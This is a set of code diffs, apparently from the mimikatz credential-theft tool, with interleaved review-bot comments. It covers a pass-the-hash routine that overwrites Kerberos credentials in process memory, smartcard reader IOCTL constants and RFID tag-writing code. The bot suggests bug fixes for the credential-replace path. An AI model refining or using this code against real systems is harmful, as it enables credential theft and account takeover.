if(pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
|
||||
if(pthData->isReplaceOk)
|
||||
{
|
||||
kprintf(L"\n \\_ *Password replace -> ");
|
||||
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING)))
|
||||
kprintf(L"null", aRemotePasswdMemory.address);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
kprintf(L"\n \\_ *Password replace @ %p (%u) -> ", aRemotePasswdMemory.address, (DWORD) kerbHelper[KerbOffsetIndex].passwordEraseSize);
|
||||
if(aLocalPasswdMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].passwordEraseSize))
|
||||
{
|
||||
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, kerbHelper[KerbOffsetIndex].passwordEraseSize))
|
||||
kprintf(L"null");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
LocalFree(aLocalPasswdMemory.address);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
|
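Review bot: In the `if(pthData->isReplaceOk)` block, a failed `LocalAlloc` is silent: nothing is printed and `pthData->isReplaceOk` stays TRUE, so the caller (outside this hunk) would believe the credential region was overwritten when nothing was written. Give that path its own branch, e.g. `else { pthData->isReplaceOk = FALSE; PRINT_ERROR_AUTO(L"LocalAlloc"); }` after the `LocalFree` closing brace. `aLocalPasswdMemory.address` is also left pointing at freed memory once `LocalFree` returns; if anything later in kuhl_m_sekurlsa_enum_kerberos_callback_pth reuses it (the function continues past the hunk), reset it to NULL there. The earlier `@ -444,7 +460,7 @@` hunk only moves the remote address computation to `offsetPasswordErase` and needs no change.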
@ -74,6 +74,9 @@ typedef struct _KERB_INFOS {
|
||||
LONG offsetSizeOfCsp;
|
||||
LONG offsetNames;
|
||||
SIZE_T structCspInfosSize;
|
||||
|
||||
LONG offsetPasswordErase;
|
||||
SIZE_T passwordEraseSize;
|
||||
} KERB_INFOS, *PKERB_INFOS;
|
||||
|
||||
typedef struct _KERB_SMARTCARD_CSP_INFO_5 {
|
||||
|
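Review bot: The two new `KERB_INFOS` members are undocumented, and nothing in this header says what region they describe; the only definition is implicit in how the `kerbHelper` entries in kuhl_m_sekurlsa_kerberos.c fill them (`FIELD_OFFSET(session, credentials) + FIELD_OFFSET(cred, Password)` and `sizeof(cred) - FIELD_OFFSET(cred, Password)`). Suggest `LONG offsetPasswordErase; // offset, from the logon-session base, of the credential's Password member` and `SIZE_T passwordEraseSize; // bytes from that member to the end of the credential structure; this whole range is overwritten on "replace"`, so the next entry added to the table follows the same convention.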
Binary file not shown.
@ -21,7 +21,7 @@ BLOCK "StringFileInfo"
|
||||
VALUE "FileDescription", "mimilove for Windows 2000"
|
||||
VALUE "FileVersion", "1.0.0.0"
|
||||
VALUE "InternalName", "mimilove"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2017 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "LegalCopyright", "Copyright (c) 2007 - 2018 gentilkiwi (Benjamin DELPY)"
|
||||
VALUE "OriginalFilename", "mimilove.exe"
|
||||
VALUE "PrivateBuild", "Build with love for POC only"
|
||||
VALUE "SpecialBuild", "kiwi flavor !"
|
||||
|
@ -85,7 +85,10 @@ extern WINSETUPAPI HDEVINFO WINAPI SetupDiGetClassDevsW(__in_opt CONST GUID *Cla
|
||||
extern WINSETUPAPI BOOL WINAPI SetupDiEnumDeviceInterfaces(__in HDEVINFO DeviceInfoSet, __in_opt PSP_DEVINFO_DATA DeviceInfoData, __in CONST GUID *InterfaceClassGuid, __in DWORD MemberIndex, __out PSP_DEVICE_INTERFACE_DATA DeviceInterfaceData);
|
||||
extern WINSETUPAPI BOOL WINAPI SetupDiGetDeviceInterfaceDetailW( __in HDEVINFO DeviceInfoSet, __in PSP_DEVICE_INTERFACE_DATA DeviceInterfaceData, __out_bcount_opt(DeviceInterfaceDetailDataSize) PSP_DEVICE_INTERFACE_DETAIL_DATA_W DeviceInterfaceDetailData, __in DWORD DeviceInterfaceDetailDataSize, __out_opt PDWORD RequiredSize, __out_opt PSP_DEVINFO_DATA DeviceInfoData);
|
||||
extern WINSETUPAPI BOOL WINAPI SetupDiDestroyDeviceInfoList(__in HDEVINFO DeviceInfoSet);
|
||||
extern WINSETUPAPI BOOL SetupDiGetDeviceRegistryPropertyW(__in HDEVINFO DeviceInfoSet, __in PSP_DEVINFO_DATA DeviceInfoData, __in DWORD Property, __out_opt PDWORD PropertyRegDataType, __out_opt PBYTE PropertyBuffer, __in DWORD PropertyBufferSize, __out_opt PDWORD RequiredSize);
|
||||
extern WINSETUPAPI BOOL SetupDiEnumDeviceInfo(__in HDEVINFO DeviceInfoSet, __in DWORD MemberIndex, __out PSP_DEVINFO_DATA DeviceInfoData);
|
||||
|
||||
#define SetupDiGetClassDevs SetupDiGetClassDevsW
|
||||
#define SetupDiGetDeviceInterfaceDetail SetupDiGetDeviceInterfaceDetailW
|
||||
#define SetupDiGetDeviceRegistryProperty SetupDiGetDeviceRegistryPropertyW
|
||||
#include <poppack.h>
|
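Review bot: The two added prototypes omit `WINAPI` while every sibling declaration in this block carries it (`extern WINSETUPAPI BOOL WINAPI SetupDiEnumDeviceInterfaces(...)`); SetupAPI exports these functions as stdcall, so on a 32-bit build the mismatch changes both the calling convention and the decorated import name, which ends in either an unresolved external or a corrupted stack at the call site (x64 masks it because it has a single convention). Change them to `extern WINSETUPAPI BOOL WINAPI SetupDiGetDeviceRegistryPropertyW(...)` and `extern WINSETUPAPI BOOL WINAPI SetupDiEnumDeviceInfo(...)`. The `#define SetupDiGetDeviceRegistryProperty SetupDiGetDeviceRegistryPropertyW` alias is fine as written.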
@ -127,4 +127,87 @@ PKIWI_DH kull_m_crypto_dh_Delete(PKIWI_DH dh);
|
||||
PKIWI_DH kull_m_crypto_dh_Create(ALG_ID targetSessionKeyType);
|
||||
BOOL kull_m_crypto_dh_CreateSessionKey(PKIWI_DH dh, PMIMI_PUBLICKEY publicKey);
|
||||
BOOL kull_m_crypto_dh_simpleEncrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
|
||||
BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
|
||||
BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
|
||||
|
||||
#define IOCTL_GET_FEATURE_REQUEST SCARD_CTL_CODE(3400)
|
||||
#define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500)
|
||||
|
||||
// ACS
|
||||
#define IOCTL_SMARTCARD_DIRECT SCARD_CTL_CODE(2050)
|
||||
#define IOCTL_SMARTCARD_SELECT_SLOT SCARD_CTL_CODE(2051)
|
||||
#define IOCTL_SMARTCARD_DRAW_LCDBMP SCARD_CTL_CODE(2052)
|
||||
#define IOCTL_SMARTCARD_DISPLAY_LCD SCARD_CTL_CODE(2053)
|
||||
#define IOCTL_SMARTCARD_CLR_LCD SCARD_CTL_CODE(2054)
|
||||
#define IOCTL_SMARTCARD_READ_KEYPAD SCARD_CTL_CODE(2055)
|
||||
#define IOCTL_SMARTCARD_READ_MAGSTRIP SCARD_CTL_CODE(2056)
|
||||
#define IOCTL_SMARTCARD_READ_RTC SCARD_CTL_CODE(2057)
|
||||
#define IOCTL_SMARTCARD_SET_RTC SCARD_CTL_CODE(2058)
|
||||
#define IOCTL_SMARTCARD_SET_OPTION SCARD_CTL_CODE(2059)
|
||||
#define IOCTL_SMARTCARD_SET_LED SCARD_CTL_CODE(2060)
|
||||
#define IOCTL_SMARTCARD_USE_ENCRYPTION SCARD_CTL_CODE(2061)
|
||||
#define IOCTL_SMARTCARD_LOAD_KEY SCARD_CTL_CODE(2062)
|
||||
#define IOCTL_SMARTCARD_COMPUTE_MAC SCARD_CTL_CODE(2063)
|
||||
#define IOCTL_SMARTCARD_DECRYPT_MAC SCARD_CTL_CODE(2064)
|
||||
#define IOCTL_SMARTCARD_READ_EEPROM SCARD_CTL_CODE(2065)
|
||||
#define IOCTL_SMARTCARD_WRITE_EEPROM SCARD_CTL_CODE(2066)
|
||||
#define IOCTL_SMARTCARD_GET_VERSION SCARD_CTL_CODE(2067)
|
||||
#define IOCTL_SMARTCARD_DUKPT_INIT_KEY SCARD_CTL_CODE(2069)
|
||||
#define IOCTL_SMARTCARD_ABORD_DUKPT_PIN SCARD_CTL_CODE(2070)
|
||||
#define IOCTL_SMARTCARD_SET_USB_VIDPID SCARD_CTL_CODE(2071)
|
||||
#define IOCTL_SMARTCARD_ACR128_ESCAPE_COMMAND SCARD_CTL_CODE(2079)
|
||||
|
||||
#define IOCTL_SMARTCARD_GET_READER_INFO SCARD_CTL_CODE(2051)
|
||||
#define IOCTL_SMARTCARD_SET_CARD_TYPE SCARD_CTL_CODE(2060)
|
||||
|
||||
// CYBERJACK
|
||||
#define CJPCSC_VEN_IOCTRL_ESCAPE SCARD_CTL_CODE(3103)
|
||||
#define CJPCSC_VEN_IOCTRL_VERIFY_PIN_DIRECT SCARD_CTL_CODE(3506)
|
||||
#define CJPCSC_VEN_IOCTRL_MODIFY_PIN_DIRECT SCARD_CTL_CODE(3507)
|
||||
#define CJPCSC_VEN_IOCTRL_MCT_READERDIRECT SCARD_CTL_CODE(3508)
|
||||
#define CJPCSC_VEN_IOCTRL_MCT_READERUNIVERSAL SCARD_CTL_CODE(3509)
|
||||
#define CJPCSC_VEN_IOCTRL_EXECUTE_PACE SCARD_CTL_CODE(3532)
|
||||
#define CJPCSC_VEN_IOCTRL_SET_NORM SCARD_CTL_CODE(3154)
|
||||
|
||||
// OMNIKEY
|
||||
#define CM_IOCTL_GET_FW_VERSION SCARD_CTL_CODE(3001)
|
||||
#define CM_IOCTL_GET_LIB_VERSION SCARD_CTL_CODE(3041) // not in doc
|
||||
#define CM_IOCTL_SIGNAL SCARD_CTL_CODE(3058)
|
||||
#define CM_IOCTL_RFID_GENERIC SCARD_CTL_CODE(3105)
|
||||
#define CM_IOCTL_SET_OPERATION_MODE SCARD_CTL_CODE(3107)
|
||||
#define CM_IOCTL_GET_MAXIMUM_RFID_BAUDRATE SCARD_CTL_CODE(3208)
|
||||
#define CM_IOCTL_SET_RFID_CONTROL_FLAGS SCARD_CTL_CODE(3213)
|
||||
#define CM_IOCTL_GET_SET_RFID_BAUDRATE SCARD_CTL_CODE(3215)
|
||||
|
||||
// GEMALTO
|
||||
#define IOCTL_VENDOR_IFD_EXCHANGE SCARD_CTL_CODE(2058)
|
||||
#define IOCTL_SMARTCARD_PC_SC_VERIFY_PIN SCARD_CTL_CODE(2060)
|
||||
#define IOCTL_SMARTCARD_PC_SC_MODIFY_PIN SCARD_CTL_CODE(2061)
|
||||
|
||||
#define FEATURE_VERIFY_PIN_START 0x01
|
||||
#define FEATURE_VERIFY_PIN_FINISH 0x02
|
||||
#define FEATURE_MODIFY_PIN_START 0x03
|
||||
#define FEATURE_MODIFY_PIN_FINISH 0x04
|
||||
#define FEATURE_GET_KEY_PRESSED 0x05
|
||||
#define FEATURE_VERIFY_PIN_DIRECT 0x06
|
||||
#define FEATURE_MODIFY_PIN_DIRECT 0x07
|
||||
#define FEATURE_MCT_READER_DIRECT 0x08
|
||||
#define FEATURE_MCT_UNIVERSAL 0x09
|
||||
#define FEATURE_IFD_PIN_PROP 0x0a
|
||||
#define FEATURE_ABORT 0x0b
|
||||
#define FEATURE_SET_SPE_MESSAGE 0x0c
|
||||
#define FEATURE_VERIFY_PIN_DIRECT_APP_ID 0x0d
|
||||
#define FEATURE_MODIFY_PIN_DIRECT_APP_ID 0x0e
|
||||
#define FEATURE_WRITE_DISPLAY 0x0f
|
||||
#define FEATURE_GET_KEY 0x10
|
||||
#define FEATURE_IFD_DISPLAY_PROPERTIES 0x11
|
||||
#define FEATURE_GET_TLV_PROPERTIES 0x12
|
||||
#define FEATURE_CCID_ESC_COMMAND 0x13
|
||||
#define FEATURE_EXECUTE_PACE 0x20
|
||||
|
||||
#pragma pack(push, 1)
|
||||
typedef struct _KIWI_TLV_FEATURE {
|
||||
BYTE Tag;
|
||||
BYTE Length; // 4
|
||||
DWORD ControlCode; // BE
|
||||
} KIWI_TLV_FEATURE, *PKIWI_TLV_FEATURE;
|
||||
#pragma pack(pop)
|
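Review bot: Several of the added `SCARD_CTL_CODE` constants share a value under unrelated names — 2051 is both `IOCTL_SMARTCARD_SELECT_SLOT` and `IOCTL_SMARTCARD_GET_READER_INFO`, 2058 is `IOCTL_SMARTCARD_SET_RTC` and `IOCTL_VENDOR_IFD_EXCHANGE`, 2060 is `IOCTL_SMARTCARD_SET_LED`, `IOCTL_SMARTCARD_SET_CARD_TYPE` and `IOCTL_SMARTCARD_PC_SC_VERIFY_PIN`, 2061 is `IOCTL_SMARTCARD_USE_ENCRYPTION` and `IOCTL_SMARTCARD_PC_SC_MODIFY_PIN` — and the names carry no vendor prefix, so nothing stops a caller from sending an ACS code to a Gemalto reader where it means something else. A comment above the first vendor group should state that: `// Vendor-specific escape codes: the same SCARD_CTL_CODE value has a different meaning on each reader family below, so these must only be sent after the reader's vendor is known; the FEATURE_* TLVs returned by IOCTL_GET_FEATURE_REQUEST (KIWI_TLV_FEATURE) are the reader-independent way to obtain a feature's control code.` The `kull_m_crypto_dh_simpleDecrypt` prototype also appears twice at the top of the hunk; if that is not a rendering artefact of the changed line, drop the duplicate. `KIWI_TLV_FEATURE.ControlCode` is marked `// BE`, which is the right hint, but a note that consumers must byte-swap before comparing it against these macros would make the intent explicit.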
@ -176,7 +176,6 @@ BOOL kull_m_file_Find(PCWCHAR directory, PCWCHAR filter, BOOL isRecursive /*TODO
|
||||
{
|
||||
if(isPrintInfos)
|
||||
kprintf(L"%*s" L"%3u %c|'%s\'\n", level << 1, L"", level, (fData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) ? L'D' : L'F' , fData.cFileName);
|
||||
|
||||
if(!(fData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
|
||||
{
|
||||
if(callback)
|
||||
|
@ -8,7 +8,7 @@
|
||||
BOOL sr98_test_device(HANDLE hFile)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
USHORT temoin = 0x4242;
|
||||
USHORT temoin = 'BB';
|
||||
BYTE *out, szOut;
|
||||
if(sr98_send_receive(hFile, SR98_IOCTL_TEST_DEVICE, &temoin, sizeof(temoin), &out, &szOut))
|
||||
{
|
||||
@ -23,6 +23,13 @@ BOOL sr98_test_device(HANDLE hFile)
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL sr98_beep(HANDLE hFile, BYTE duration)
|
||||
{
|
||||
if(duration > 9)
|
||||
duration = 9;
|
||||
return sr98_send_receive(hFile, SR98_IOCTL_BEEP, &duration, 1, NULL, NULL);
|
||||
}
|
||||
|
||||
BOOL sr98_read_emid(HANDLE hFile, BYTE emid[5])
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
@ -47,13 +54,13 @@ BOOL sr98_t5577_write_block(HANDLE hFile, BYTE page, BYTE block, DWORD data, BYT
|
||||
//if(lockBit) // ????
|
||||
// blockContent[1] |= SR98_T5577_LOCKBIT_MASK
|
||||
|
||||
*(PDWORD) (blockContent + 2) = data;
|
||||
*(PDWORD) (blockContent + 2) = data;
|
||||
blockContent[6] = block & 7;
|
||||
|
||||
if(isPassword)
|
||||
{
|
||||
blockContent[0] = SR98_SUB_IOCTL_T5577_WRITE_BLOCK_PASS;
|
||||
*(PDWORD) (blockContent + 7) = password;
|
||||
*(PDWORD) (blockContent + 7) = password;
|
||||
}
|
||||
|
||||
if(sr98_send_receive(hFile, SR98_IOCTL_T5577, blockContent, isPassword ? sizeof(blockContent) : sizeof(blockContent) - sizeof(DWORD), &out, &szOut))
|
||||
@ -102,9 +109,9 @@ BOOL sr98_send_receive(HANDLE hFile, BYTE ctl, LPCVOID in, BYTE szIn, LPBYTE *ou
|
||||
BYTE i, crc, inBuffer[24] = {0x03, 0x01, 5 + szIn}, outBuffer[256] = {0}, szBuffer;
|
||||
DWORD ret;
|
||||
|
||||
kprintf(L"> ");
|
||||
kull_m_string_wprintf_hex(in, szIn, 1);
|
||||
kprintf(L"\n");
|
||||
//kprintf(L"> ");
|
||||
//kull_m_string_wprintf_hex(in, szIn, 1);
|
||||
//kprintf(L"\n");
|
||||
if(szIn < (24 - 6))
|
||||
{
|
||||
inBuffer[3] = ctl;
|
||||
@ -142,16 +149,16 @@ BOOL sr98_send_receive(HANDLE hFile, BYTE ctl, LPCVOID in, BYTE szIn, LPBYTE *ou
|
||||
if((outBuffer[4 + szBuffer] == crc) && (outBuffer[5 + szBuffer] == 0x04))
|
||||
{
|
||||
status = TRUE;
|
||||
if(out && szOut)
|
||||
if(szBuffer && out && szOut)
|
||||
{
|
||||
*szOut = szBuffer;
|
||||
if(*out = (PBYTE) LocalAlloc(LPTR, szBuffer))
|
||||
RtlCopyMemory(*out, outBuffer + 4, szBuffer);
|
||||
else status = FALSE;
|
||||
}
|
||||
kprintf(L"< ");
|
||||
kull_m_string_wprintf_hex(outBuffer + 4, szBuffer, 1);
|
||||
kprintf(L"\n");
|
||||
//kprintf(L"< ");
|
||||
//kull_m_string_wprintf_hex(outBuffer + 4, szBuffer, 1);
|
||||
//kprintf(L"\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Bad CRC/data\n");
|
||||
}
|
||||
|
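Review bot: With the guard changed to `if(szBuffer && out && szOut)`, a successful exchange that carries no payload now returns TRUE without touching `*out` or `*szOut`, so a caller that declares them uninitialized — `BYTE *out, szOut;` in sr98_test_device in this section — reads indeterminate values afterwards (what sr98_test_device does with them is outside its hunk). Keep the outer `out && szOut` check, always store `*szOut = szBuffer` and `*out = NULL`, and only allocate when `szBuffer` is non-zero, which also preserves the intent of not calling `LocalAlloc` with a zero size. Both this hunk and the one at `@ -102,9 +109,9 @@` leave the hex-dump trace as commented-out `//kprintf` lines; gating it behind a verbose flag or deleting it would be cleaner than dead code.
```c
if(out && szOut)
{
	*szOut = szBuffer;
	*out = NULL;
	if(szBuffer)
	{
		if(*out = (PBYTE) LocalAlloc(LPTR, szBuffer))
			RtlCopyMemory(*out, outBuffer + 4, szBuffer);
		else status = FALSE;
	}
}
// … unchanged: trace output and "Bad CRC/data" error path …
```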